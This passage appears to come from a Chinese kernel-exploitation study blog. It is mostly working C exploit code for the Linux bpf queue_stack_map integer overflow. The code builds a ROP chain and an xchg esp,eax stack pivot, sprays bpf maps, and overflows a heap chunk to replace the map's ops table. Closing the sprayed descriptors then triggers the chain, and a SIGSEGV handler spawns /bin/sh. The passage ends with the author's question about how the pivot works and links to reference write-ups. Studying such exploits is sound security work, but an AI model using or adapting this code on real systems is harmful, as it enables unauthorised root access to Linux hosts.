    *(unsigned long*)(krop_base_to_map+0x3000) = 0;
    *(unsigned long*)(krop_base_to_map+0x4000) = 0;
    *(unsigned long*)(krop_base_to_map+0x5000) = 0;
    *(unsigned long*)(krop_base_to_map+0x6000) = 0;
    *(unsigned long*)(krop_base_to_map+0x7000) = 0;
    *(unsigned long*)(fakestack+0x4000) = 0;
    *(unsigned long*)(fakestack+0x3000) = 0;
    *(unsigned long*)(fakestack+0x2000) = 0;
    *(unsigned long*)(fakestack+0x1000) = 0;
    *(unsigned long*)(fakestack) = 0;
    *(unsigned long*)(fakestack+0x10) = stack_pivot_gadget;        //0x10 is the offset of map_release() in the ops table. The gadget is xchg esp,eax, so only the low 4 bytes (0x81954dc8) end up in esp, which completes the pivot
    *(unsigned long*)(fakestack+0x7000) = 0;
    *(unsigned long*)(fakestack+0x6000) = 0;
    *(unsigned long*)(fakestack+0x5000) = 0;
    rop_chain[12+2]=user_cs;
    rop_chain[13+2]=user_rflags;
    rop_chain[14+2]=(unsigned long)(fakestack + 0x6000);
    rop_chain[15+2]=user_ss;
    memcpy(krop_base_mapped+rop_start,rop_chain,sizeof(rop_chain)); //the pivot gadget's "ret 0x674" moves the stack up by 0x674, so the chain is written starting at 0x81954dc8+0x674
    puts("rop_payload_initialized");
}

/* Fallback syscall number for bpf() when the headers do not define it. */
#ifndef __NR_bpf
#define __NR_bpf 321
#endif

/* r[0] receives the return value of the first bpf() call in main() when that call does not return -1. */
uint64_t r[1] = {0xffffffffffffffff};

/*
 * defragmentation: open 200 files named xxx0 .. xxx199 for writing and leave
 * them open. Author's note: the purpose is not fully understood; it was
 * carried over from the reference exploit.
 */
void defragment(){
    char path[100];
    FILE* handle;
    int idx = 0;

    while (idx < 200) {
        snprintf(path, 100, "xxx%d", idx);
        handle = fopen(path, "w");
        idx++;
    }
}

/* Return values of the sprayed bpf() calls, one per iteration of spray(). */
long victim[SPRAY_NUMBER];
/*
 * Spray: repeat the bpf() call with command 0 and the attribute block at
 * 0x200011c0 (size 0x2c) SPRAY_NUMBER times, storing each result in victim[].
 * Author's note: every map created this way has the overflowed size, and the
 * aim is to get one allocated next to the first map.
 */
void spray(){
    int idx = 0;

    while (idx < SPRAY_NUMBER) {
        victim[idx] = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);
        idx++;
    }
}
/*
 * Installed by main() as the SIGSEGV handler: print two status lines, run
 * id(1), then replace this process with /bin/sh.
 */
void get_shell_again(){
  char *argv[2] = {"/bin/sh", NULL};

  puts("SIGSEGV found");
  puts("get shell again");
  system("id");
  execve(argv[0], argv, NULL);
}
/*
 * Proof-of-concept driver. Builds a BPF_MAP_CREATE attribute block at
 * 0x200011c0 with max_entries = 0xffffffff, creates one map plus
 * SPRAY_NUMBER more through spray(), pushes one 0x40-byte value into the
 * first map via bpf() command 2, and finally closes the sprayed descriptors.
 */
int main(void)
{
  signal(SIGSEGV,get_shell_again);  //run get_shell_again() as the handler when SIGSEGV is delivered
  //get_shell();
  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);  //map 0x1000000 bytes at 0x20000000 as scratch space for the attribute blocks
  long res = 0;
    //fill in the first struct of union bpf_attr (the map_create layout)
  *(uint32_t*)0x200011c0 = 0x17;   //map_type; author's note: the type needed to reach queue_stack_map_alloc
  *(uint32_t*)0x200011c4 = 0;      //key_size
  *(uint32_t*)0x200011c8 = 0x40;   //value_size; also the size of the value buffer at 0x20000140 used below
  *(uint32_t*)0x200011cc = -1;     //max_entries = 0xffffffff
  *(uint32_t*)0x200011d0 = 0;
  *(uint32_t*)0x200011d4 = -1;
  *(uint32_t*)0x200011d8 = 0;
  *(uint8_t*)0x200011dc = 0;
  *(uint8_t*)0x200011dd = 0;
  *(uint8_t*)0x200011de = 0;
  *(uint8_t*)0x200011df = 0;
  *(uint8_t*)0x200011e0 = 0;
  *(uint8_t*)0x200011e1 = 0;
  *(uint8_t*)0x200011e2 = 0;
  *(uint8_t*)0x200011e3 = 0;
  *(uint8_t*)0x200011e4 = 0;
  *(uint8_t*)0x200011e5 = 0;
  *(uint8_t*)0x200011e6 = 0;
  *(uint8_t*)0x200011e7 = 0;
  *(uint8_t*)0x200011e8 = 0;
  *(uint8_t*)0x200011e9 = 0;
  *(uint8_t*)0x200011ea = 0;
  *(uint8_t*)0x200011eb = 0;
  save_state();    //save the current segment/flags values for the later return to user space
  printf("user_cs:%llx   user_ss: %llx\n",user_cs,user_ss);
  prepare_krop();
  res = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);  //triggers the integer overflow; this is the map that will overflow, and the spray should place another map right after it
  if (res != -1)
    r[0] = res;
  spray();
     //fill in the second struct of union bpf_attr (the map_update_elem layout)
  *(uint32_t*)0x200000c0 = r[0];    //map_fd: the value returned by the first bpf() call above
  *(uint64_t*)0x200000c8 = 0;
  *(uint64_t*)0x200000d0 = 0x20000140;   //value: address of the data that gets copied
  *(uint64_t*)0x200000d8 = 2;
  uint64_t* ptr = (uint64_t*)0x20000140;   //author's note: the overwrite only starts after 0x30 bytes; ops is the first field, but chunks are 0x100-aligned (kmalloc-256)
  ptr[0]=1;
  ptr[1]=2;
  ptr[2]=3;
  ptr[3]=4;
  ptr[4]=5;
  ptr[5]=6;
  ptr[6]=0xa000000000;             //address of fakestack, which holds the fake ops table; mind the ops layout
  ptr[7]=8;
  syscall(__NR_bpf, 2, 0x200000c0, 0x20);   //triggers the heap overflow; note that a different attr layout is used here
  int i;
  *(unsigned long*)(fakestack+0x7000) = 0;
  *(unsigned long*)(fakestack+0x6000) = 0;
  *(unsigned long*)(fakestack+0x5000) = 0;
  for(i=0;i<SPRAY_NUMBER;i++){              //close every sprayed fd to reach the overwritten map_release(); author's note: succeeds with high probability
      close(victim[i]);
  }
  //pause();
  return 0;
}

一些问题

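栈迁移那边我不怎么懂:明明只是覆盖了ops里的函数指针,照理来说应该是直接通过call指令调用map->ops->map_release(),也就是直接跳到stack_pivot_gadget的地址去执行xchg。我不明白的是,我们明明没有直接控制rsp和rax,为什么还是迁移成功了。(一种可能的解释:间接调用时函数地址通常先被装入rax,此时eax正好是gadget地址的低4字节0x81954dc8,xchg esp,eax之后esp就落在了我们提前mmap好的用户态地址上——有待调试确认。)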

参考文章

ww9210师傅的安全客原文:
[1]: https://www.anquanke.com/post/id/166819#h3-5
P4nda师傅的文章
[2]: http://p4nda.top/2019/01/02/kernel-bpf-overflow/
钞sir师傅的文章
[3]: https://blog.csdn.net/qq_40827990/article/details/102926930
bsauce师傅的文章
[4]: https://www.cnblogs.com/bsauce/p/11560224.html

你可能感兴趣的:(linux_kernel)